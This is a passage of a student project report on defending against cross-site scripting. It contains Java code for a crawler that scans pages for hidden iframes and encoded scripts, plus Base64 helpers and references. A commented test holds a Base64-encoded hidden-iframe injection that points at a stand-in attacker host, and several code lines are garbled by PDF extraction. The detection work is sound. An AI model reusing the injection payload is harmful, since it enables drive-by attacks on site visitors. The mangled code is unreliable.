import javax.swing.text.html.*;
public class HTMLParse extends HTMLEditorKit {
public HTMLEditorKit.Parser getParser()
{
return super.getParser();
}
}
import java.awt.*;import javax.swing.*;
import java.net.*;
import java.io.*;
42
-
8/3/2019 Cross Site
43/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
public class CheckLinks extends javax.swing.JFrame implements
Runnable,ISpiderReportable {
public CheckLinks()
{
try
{
setTitle("Cross-Site Scripting");
System.out.println("kkkk");
getContentPane().setLayout(null);
setSize(405,288);
setVisible(false);
label1.setText("Enter a URL:");
getContentPane().add(label1);
label1.setBounds(12,12,84,12);
begin.setText("Enter");
begin.setActionCommand("Begin");
getContentPane().add(begin);
begin.setBounds(12,36,84,24);
getContentPane().add(url);
url.setBounds(108,36,288,24);
errorScroll.setAutoscrolls(true);
errorScroll.setHorizontalScrollBarPolicy(javax.swing.
ScrollPaneConstants.HORIZONTAL_SCROLLBAR_ALWAYS);
errorScroll.setVerticalScrollBarPolicy(javax.swing.
ScrollPaneConstants.VERTICAL_SCROLLBAR_ALWAYS);
errorScroll.setOpaque(true);
getContentPane().add(errorScroll);
errorScroll.setBounds(12,120,384,156);
43
-
8/3/2019 Cross Site
44/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
errors.setEditable(false);
errorScroll.getViewport().add(errors);
errors.setBounds(0,0,366,138);
current.setText("Current Page: ");
getContentPane().add(current);
current.setBounds(12,72,400,12);
goodLinksLabel.setText("Status : ");
getContentPane().add(goodLinksLabel);
goodLinksLabel.setBounds(12,96,192,12);
// badLinksLabel.setText("Bad Links: 0");
//getContentPane().add(badLinksLabel);
badLinksLabel.setBounds(216,96,96,12);
setDefaultCloseOperation(EXIT_ON_CLOSE);
SymAction lSymAction = new SymAction();
begin.addActionListener(lSymAction);
}
catch(Exception ex)
{
ex.printStackTrace();
System.out.println(ex);
}
}
public void addNotify(){
Dimension size = getSize();
super.addNotify();
if ( frameSizeAdjusted )
44
-
8/3/2019 Cross Site
45/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
return;
frameSizeAdjusted = true;
Insets insets = getInsets();
javax.swing.JMenuBar menuBar = getRootPane().getJMenuBar();
int menuBarHeight = 0;
if ( menuBar != null )
menuBarHeight = menuBar.getPreferredSize().height;
setSize(insets.left + insets.right + size.width, insets.top +
insets.bottom + size.height +
menuBarHeight);
}
boolean frameSizeAdjusted = false;
javax.swing.JLabel label1 = new javax.swing.JLabel();
javax.swing.JButton begin = new javax.swing.JButton();
javax.swing.JTextField url = new javax.swing.JTextField();
javax.swing.JScrollPane errorScroll =
new javax.swing.JScrollPane();
static javax.swing.JTextArea errors = new javax.swing.JTextArea();
45
-
8/3/2019 Cross Site
46/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
javax.swing.JLabel current = new javax.swing.JLabel();
static javax.swing.JLabel goodLinksLabel = new javax.swing.JLabel();
javax.swing.JLabel badLinksLabel = new javax.swing.JLabel();
protected Thread backgroundThread;
protected Spider spider;
protected URL base;
protected int badLinksCount = 0;
protected int goodLinksCount = 0;
class SymAction implements java.awt.event.ActionListener {
public void actionPerformed(java.awt.event.ActionEvent event)
{
Object object = event.getSource();
if ( object == begin )
begin_actionPerformed(event);
}
}
void begin_actionPerformed(java.awt.event.ActionEvent event)
46
-
8/3/2019 Cross Site
47/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
{
if ( backgroundThread==null ) {
begin.setLabel("Cancel");
backgroundThread = new Thread(this);
backgroundThread.start();
goodLinksCount=0;
badLinksCount=0;
current.setText("Current Page: " + url.getText());
//goodLinksLabel.setText("Good Links: " + goodLinksCount);
} else {
spider.cancel();
}
}
public void run()
{
try {
errors.setText("");
spider = new Spider(this);
spider.clear();
base = new URL(url.getText());
spider.addURL(base);
spider.begin();
Runnable doLater = new Runnable()
{
public void run()
{
begin.setText("Enter");
}
47
-
8/3/2019 Cross Site
48/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
};
SwingUtilities.invokeLater(doLater);
backgroundThread=null;
} catch ( MalformedURLException e ) {
UpdateErrors err = new UpdateErrors();
err.msg = "Bad address.";
SwingUtilities.invokeLater(err);
}
}
public boolean spiderFoundURL(URL base,URL url)
{
UpdateCurrentStats cs = new UpdateCurrentStats();
cs.msg = url.toString();
SwingUtilities.invokeLater(cs);
if ( !checkLink(url) ) {
UpdateErrors err = new UpdateErrors();
err.msg = url+"(on page " + base + ")\n";
SwingUtilities.invokeLater(err);
badLinksCount++;
return false;
}
goodLinksCount++;
if ( !url.getHost().equalsIgnoreCase(base.getHost()) )
return false;
else
48
-
8/3/2019 Cross Site
49/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
return true;
}
public void spiderURLError(URL url)
{
}
protected boolean checkLink(URL url)
{
try {
URLConnection connection = url.openConnection();
connection.connect();
return true;
} catch ( IOException e ) {
return false;
}
}
public static void setErrorStatus(String error)
{
//if(loc == 0)
errors.append(error+"\n");
/*else
errors.insert(error, loc);*/
}
public static void setStatusLabel(String sts)
{
goodLinksLabel.setText(sts);
49
-
8/3/2019 Cross Site
50/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
}
public void spiderFoundEMail(String email)
{
}
class UpdateErrors implements Runnable {
public String msg;
public void run()
{
errors.append(msg);
}
}
class UpdateCurrentStats implements Runnable {
public String msg;
public void run()
{
current.setText("Current Page: " + url.getText());
goodLinksLabel.setText("Good Links: " + goodLinksCount);
badLinksLabel.setText("Bad Links: " + badLinksCount);
}
}
}
50
-
8/3/2019 Cross Site
51/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
import java.util.*;
import java.net.*;
import java.io.*;
import javax.swing.text.*;
import javax.swing.text.html.*;
public class Spider
{
String pageCnt = "";
protected Collection workloadError = new ArrayList(3);
protected Collection workloadWaiting = new ArrayList(3);
protected Collection workloadProcessed = new ArrayList(3);
protected ISpiderReportable report;
protected boolean cancel = false;
public Spider(ISpiderReportable report)
{
this.report = report;
}
51
-
8/3/2019 Cross Site
52/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
public Collection getWorkloadError()
{
return workloadError;
}
public Collection getWorkloadWaiting()
{
return workloadWaiting;
}
public Collection getWorkloadProcessed()
{
return workloadProcessed;
}
public void clear()
{
getWorkloadError().clear();
getWorkloadWaiting().clear();
getWorkloadProcessed().clear();
}
public void cancel()
{
cancel = true;
52
-
8/3/2019 Cross Site
53/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
}
public void addURL(URL url)
{
if ( getWorkloadWaiting().contains(url) )
return;
if ( getWorkloadError().contains(url) )
return;
if ( getWorkloadProcessed().contains(url) )
return;
log("Adding to workload: " + url );
getWorkloadWaiting().add(url);
}
public void processURL(URL url)
{
try {
log("Processing: " + url );
URLConnection connection = url.openConnection();
if ( (connection.getContentType()!=null) &&
!connection.getContentType().toLowerCase().startsWith("text/") ) {
getWorkloadWaiting().remove(url);
getWorkloadProcessed().add(url);
log("Not processing because content type is: " +
connection.getContentType() );
return;
}
53
-
8/3/2019 Cross Site
54/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
InputStream is = connection.getInputStream();
Reader r = new InputStreamReader(is);
int i = 0;
while((i = is.read()) != -1)
pageCnt += (char)i;
HTMLEditorKit.Parser parse = new HTMLParse().getParser();
parse.parse(r,new Parser(url),true);
} catch ( IOException e ) {
getWorkloadWaiting().remove(url);
getWorkloadError().add(url);
log("Error: " + url );
report.spiderURLError(url);
return;
}
getWorkloadWaiting().remove(url);
getWorkloadProcessed().add(url);
log("Complete: " + url );
MainClass m=new MainClass();
CheckLinks.setErrorStatus("Removing Comments\n");
String cntwocomment = removeComments(pageCnt);
CheckLinks.setErrorStatus("Processing Script Contents\n");
int len = 6, i = 0;
boolean find1 = false, find2 = false, find3 = false, find4 = false;
int start = 0, end = 0, start1 = 0, end1 = 0;
String scriptCnt = "";
boolean scriptstatus = true, iframestatus = true;
54
-
8/3/2019 Cross Site
55/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
String scriptContent = "";
while(i < cntwocomment.length()-8)
{
if(find1) {
String temp = cntwocomment.substring(i, i+7);
if(temp.equalsIgnoreCase("/script")) {
find2 = true;
end = i+8;
}
} else {
String temp = cntwocomment.substring(i, i+7);
if(temp.equalsIgnoreCase("
-
8/3/2019 Cross Site
56/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
start1 = i;
System.out.println(temp);
}
}
if(find1 && find2)
{
scriptContent = cntwocomment.substring(start, end);
//System.out.println("script : "+scriptContent);
find1 = false;
find2 = false;
scriptstatus = new ScriptReader(scriptContent).scanScript();
if(!scriptstatus)
break;
}
if(find3 && find4)
{
String iframeContent = cntwocomment.substring(start1, end1);
find3 = false;
find4 = false;
iframestatus = new ScriptReader(iframeContent).scanIframe();
if(!scriptstatus)
break;
}
i++;
}
CheckLinks.setErrorStatus("Processing completed");
if(scriptstatus && iframestatus)
{
56
-
8/3/2019 Cross Site
57/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CheckLinks.setStatusLabel("Status : Verified");
try
{
Runtime r=Runtime.getRuntime();
r.exec("cmd /c start "+url);
}
catch(Exception ex)
{
System.out.println(ex);
}
} else {
CheckLinks.setStatusLabel("Status : Cross-site Scripting");
System.out.println("Cross-site Scripting");
}
}
public void begin()
{
cancel = false;
while ( !getWorkloadWaiting().isEmpty() && !cancel ) {
Object list[] = getWorkloadWaiting().toArray();
for ( int i=0;(i
-
8/3/2019 Cross Site
58/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
protected URL base;
public Parser(URL base)
{
this.base = base;
}
public void handleSimpleTag(HTML.Tag t,
MutableAttributeSet a,int pos)
{
String href = (String)a.getAttribute(HTML.Attribute.HREF);
if( (href==null) && (t==HTML.Tag.FRAME) )
href = (String)a.getAttribute(HTML.Attribute.SRC);
if ( href==null )
return;
int i = href.indexOf('#');
if ( i!=-1 )
href = href.substring(0,i);
if ( href.toLowerCase().startsWith("mailto:") ) {
report.spiderFoundEMail(href);
return;
}
handleLink(base,href);
}
public void handleStartTag(HTML.Tag t,
58
-
8/3/2019 Cross Site
59/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
MutableAttributeSet a,int pos)
{
handleSimpleTag(t,a,pos);
}
protected void handleLink(URL base,String str)
{
try {
URL url = new URL(base,str);
if ( report.spiderFoundURL(base,url) )
addURL(url);
} catch ( MalformedURLException e ) {
log("Found malformed URL: " + str );
}
}
}
public String removeComments(String content)
{
int i = 0;
boolean find1 = false, find2 = false;
int start = 0, end = 0;
String Cntwocomment = "";
while(i < content.length()-4)
{
if(find1)
{
String temp = content.substring(i, i+3);
59
-
8/3/2019 Cross Site
60/89
-
8/3/2019 Cross Site
61/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
{
System.out.println( (new Date()) + ":" + entry );
}
}
import java.net.*;
interface ISpiderReportable {
public boolean spiderFoundURL(URL base,URL url);
public void spiderURLError(URL url);
public void spiderFoundEMail(String email);
}
import java.util.regex.*;
public class ScriptReader
{
Pattern p1, p2, p3, p4, p5, p6, p7, p8, p9,p10, p11, p12, p13, p14,p15,p16,p17;
String script = "", encScript = "";
boolean showStatus = true, enc = false;
public ScriptReader(String script)
{
this.script = script;
p1 = Pattern.compile("script");
p2 = Pattern.compile("iframe");
p3 = Pattern.compile("width");
p4 = Pattern.compile("height");
p5 = Pattern.compile("style");
p6 = Pattern.compile("width=0");
p7 = Pattern.compile("height=0");
61
-
8/3/2019 Cross Site
62/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
p8 = Pattern.compile("display:none;");
p9 = Pattern.compile("width=\"0\"");
p10 = Pattern.compile("height=\"0\"");
p11 = Pattern.compile("\"display:none\"");
//p12 = Pattern.compile("@&%mkmd#@~ZQAA");
//p13 = Pattern.compile("#@ZQAAKmsYRSDb");
//p14 = Pattern.compile("language=\"JScript\"");
//p15 = Pattern.compile("language=\"JavaScript\"");
p14 = Pattern.compile("language=\"jscript.encode\"");
p15 = Pattern.compile("language=\"javascript.encode\"");
}
public boolean scanScript()
{
boolean status = true;
//CheckLinks.setErrorStatus("Processing Script Content\n");
Matcher m1 = p1.matcher(script);
int loc = 0;
if(m1.find())
{
String lower = script.toLowerCase();
Matcher m14 = p14.matcher(lower);
Matcher m15 = p15.matcher(lower);
String temp = script.substring(script.indexOf(">")+1);
encScript = temp.substring(0, temp.lastIndexOf("
-
8/3/2019 Cross Site
63/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
script =
ScriptDecoder.decodeString(encScript.replace("\n", "").trim());
enc = true;
}
System.out.println("Script "+script);
script = script.toLowerCase();
System.out.println("Processing Script");
Matcher m2 = p2.matcher(script);
if(m2.find()) {
System.out.println("Processing IFrame");
Matcher m3 = p3.matcher(script);
if(m3.find()) {
Matcher m6 = p6.matcher(script);
Matcher m9 = p9.matcher(script);
if(m6.find() || m9.find()) {
System.out.println("Width Property is
Zero");
status = false;
if(showStatus) {
if(enc)
showScript("Encoded
Content : \n"+encScript+"\n");
showScript("Script Scource :
\n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Width Property
is Zero");
}
} else {
63
-
8/3/2019 Cross Site
64/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
System.out.println("There is No Width Property");
}
Matcher m4 = p4.matcher(script);
if(m4.find()) {
Matcher m7 = p7.matcher(script);
Matcher m10 = p10.matcher(script);
if(m7.find() || m10.find()) {
System.out.println("Height Property is
Zero");
status = false;
if(showStatus) {
if(enc)
showScript("Encoded
Content : \n"+encScript+"\n");
showScript("Script Scource :
\n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Hight Property
is Zero");
}
} else {
System.out.println("There is No Height Property");
}
Matcher m5 = p5.matcher(script);
if(m5.find()) {
Matcher m8 = p8.matcher(script);
Matcher m11 = p11.matcher(script);
if(m8.find() || m11.find()) {
64
-
8/3/2019 Cross Site
65/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
System.out.println("Display Property is
None");
status = false;
if(showStatus) {
if(enc)
showScript("Encoded
Content : \n"+encScript+"\n");
showScript("Script Scource :
\n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Display
Property is None");
}
} else {
System.out.println("There is No Display Property");
}
}
} else {
System.out.println("No Script");
}
return status;
}
public void showScript(String script)
{
if(showStatus)
CheckLinks.setErrorStatus(script);
}
65
-
8/3/2019 Cross Site
66/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
public boolean scanIframe()
{
boolean status = true;
System.out.println("IFrame "+script);
script = script.toLowerCase();
System.out.println("Processing Script");
Matcher m2 = p2.matcher(script);
if(m2.find())
{
System.out.println("Processing IFrame");
Matcher m3 = p3.matcher(script);
if(m3.find()) {
Matcher m6 = p6.matcher(script);
Matcher m9 = p9.matcher(script);
if(m6.find() || m9.find()) {
System.out.println("Width Property is Zero");
status = false;
if(showStatus) {
showScript("IFrame Scource :
\n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Width Property is
Zero");
}
} else {
System.out.println("There is No Width Property");
}
Matcher m4 = p4.matcher(script);
if(m4.find()) {
66
-
8/3/2019 Cross Site
67/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Matcher m7 = p7.matcher(script);
Matcher m10 = p10.matcher(script);
if(m7.find() || m10.find()) {
System.out.println("Height Property is Zero");
status = false;
if(showStatus) {
showScript("IFrame Scource :
\n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Hight Property is
Zero");
}
} else {
System.out.println("There is No Height Property");
}
Matcher m5 = p5.matcher(script);
if(m5.find()) {
Matcher m8 = p8.matcher(script);
Matcher m11 = p11.matcher(script);
if(m8.find() || m11.find()) {
System.out.println("Display Property is None");
status = false;
if(showStatus) {
showScript("IFrame Scource :
\n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Display Property is
None");
}
67
-
8/3/2019 Cross Site
68/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
} else {
System.out.println("There is No Display Property");
}
}
return status;
}
/*public static void main(String[] args)
{
String script1 = " ";
String script2 = " ";
String script3 = "ZG9jdW1lbnQud3JpdGVsbiAoIjxJZnJhbWUiIHNyYz
1odHRwOi8vd3d3LmhhY2tlcmV4YW1wbGUuY24gd2lkdGg9MCBoZWlnaHQ9MD48
Ly9pZnJhbWU+KTs=";
new ScriptReader(script1).scanScript();
new ScriptReader(script2).scanScript();
new ScriptReader(script3).scanScript();
}*/
}
68
-
8/3/2019 Cross Site
69/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
public class ScriptEncoder
{
public static char[] map1 = new char[64];
public static byte[] map2 = new byte[128];
public ScriptEncoder()
{
}
static
{
int i=0;
for (char c='A'; c
-
8/3/2019 Cross Site
70/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
return new String(encode(s.getBytes()));
}
public static char[] encode (byte[] in)
{
return encode(in,in.length);
}
public static char[] encode (byte[] in, int iLen)
{
int oDataLen = (iLen*4+2)/3; // output length without
padding
int oLen = ((iLen+2)/3)*4; // output length including
padding
char[] out = new char[oLen];
int ip = 0;
int op = 0;
while (ip < iLen)
{
int i0 = in[ip++] & 0xff;
int i1 = ip < iLen ? in[ip++] & 0xff : 0;
int i2 = ip < iLen ? in[ip++] & 0xff : 0;
int o0 = i0 >>> 2;
int o1 = ((i0 & 3) >> 4);
int o2 = ((i1 & 0xf) >> 6);
int o3 = i2 & 0x3F;
out[op++] = map1[o0];
out[op++] = map1[o1];
out[op] = op < oDataLen ? map1[o2] : '='; op++;
70
-
8/3/2019 Cross Site
71/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
out[op] = op < oDataLen ? map1[o3] : '='; op++;
}
return out;
}
public static void main(String a[])
{
System.out.println(encodeString("document.writeln(\"\");"));
}
}
public class ScriptDecoder
{
public static char[] map1 = new char[64];
public static byte[] map2 = new byte[128];
public ScriptDecoder(){
}
static
{
int i=0;
for (char c='A'; c
-
8/3/2019 Cross Site
72/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
static
{
for (int i=0; i 0 && in[iLen-1] == '=') iLen--;
int oLen = (iLen*3) / 4;
byte[] out = new byte[oLen];
int ip = 0;
int op = 0;
while (ip < iLen)
{
72
-
8/3/2019 Cross Site
73/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
int i0 = in[ip++];
int i1 = in[ip++];
int i2 = ip < iLen ? in[ip++] : 'A';
int i3 = ip < iLen ? in[ip++] : 'A';
if (i0 > 127 || i1 > 127 || i2 > 127 || i3 > 127)
throw new IllegalArgumentException ("Illegal character
in Base64 encoded data.");
int b0 = map2[i0];
int b1 = map2[i1];
int b2 = map2[i2];
int b3 = map2[i3];
if (b0 < 0 || b1 < 0 || b2 < 0 || b3 < 0)
throw new IllegalArgumentException ("Illegal character in
Base64 encoded data.");
int o0 = ( b0 >4);
int o1 = ((b1 & 0xf)>2);
int o2 = ((b2 & 3)
-
8/3/2019 Cross Site
74/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
public ScriptDecoder()
{
}
static
{
int i=0;
for (char c='A'; c
-
8/3/2019 Cross Site
75/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
}
public static byte[] decode (char[] in)
{
int iLen = in.length;
if (iLen%4 != 0) throw new IllegalArgumentException ("Length of
Base64 encoded input string is not a multiple of 4.");
while (iLen > 0 && in[iLen-1] == '=') iLen--;
int oLen = (iLen*3) / 4;
byte[] out = new byte[oLen];
int ip = 0;
int op = 0;
while (ip < iLen)
{
int i0 = in[ip++];
int i1 = in[ip++];
int i2 = ip < iLen ? in[ip++] : 'A';
int i3 = ip < iLen ? in[ip++] : 'A';
if (i0 > 127 || i1 > 127 || i2 > 127 || i3 > 127)
throw new IllegalArgumentException ("Illegal character
in Base64 encoded data.");
int b0 = map2[i0];
int b1 = map2[i1];
int b2 = map2[i2];
int b3 = map2[i3];
if (b0 < 0 || b1 < 0 || b2 < 0 || b3 < 0)
throw new IllegalArgumentException ("Illegal character in
Base64 encoded data.");
int o0 = ( b0 >4);
int o1 = ((b1 & 0xf)>2);
int o2 = ((b2 & 3)
-
8/3/2019 Cross Site
76/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
out[op++] = (byte)o0;
if (op
-
8/3/2019 Cross Site
77/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
9.2 SCREEN SHOTS
77
-
8/3/2019 Cross Site
78/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 78
-
8/3/2019 Cross Site
79/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 79
-
8/3/2019 Cross Site
80/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 80
-
8/3/2019 Cross Site
81/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 81
-
8/3/2019 Cross Site
82/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 82
-
8/3/2019 Cross Site
83/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 83
-
8/3/2019 Cross Site
84/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 84
-
8/3/2019 Cross Site
85/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 85
-
8/3/2019 Cross Site
86/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 86
-
8/3/2019 Cross Site
87/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 87
-
8/3/2019 Cross Site
88/89
Defence mechanism and prevention of attack for cross-site scripting forgery________ 88
-
8/3/2019 Cross Site
89/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 10
REFERENCES
1] OWASP CSRFGuard Project, Accessed from http://www.owasp.org (May 2010).
[2] A. Barth, C. Jackson, and J. Mitchell, Robust Defenses for Cross-Site RequestForgery,Proc. of the 15th ACM Conference on Computer and Communications
Security, Alexandria, Virginia .
[3] W. Maes, T. Heyman, L. Desmet, and W. Joosen, Browser Protection against Cross-
Site Request Forgery, InProc. Of the Workshop on Secure Execution of UntrustedCode, Chicago, USA .
89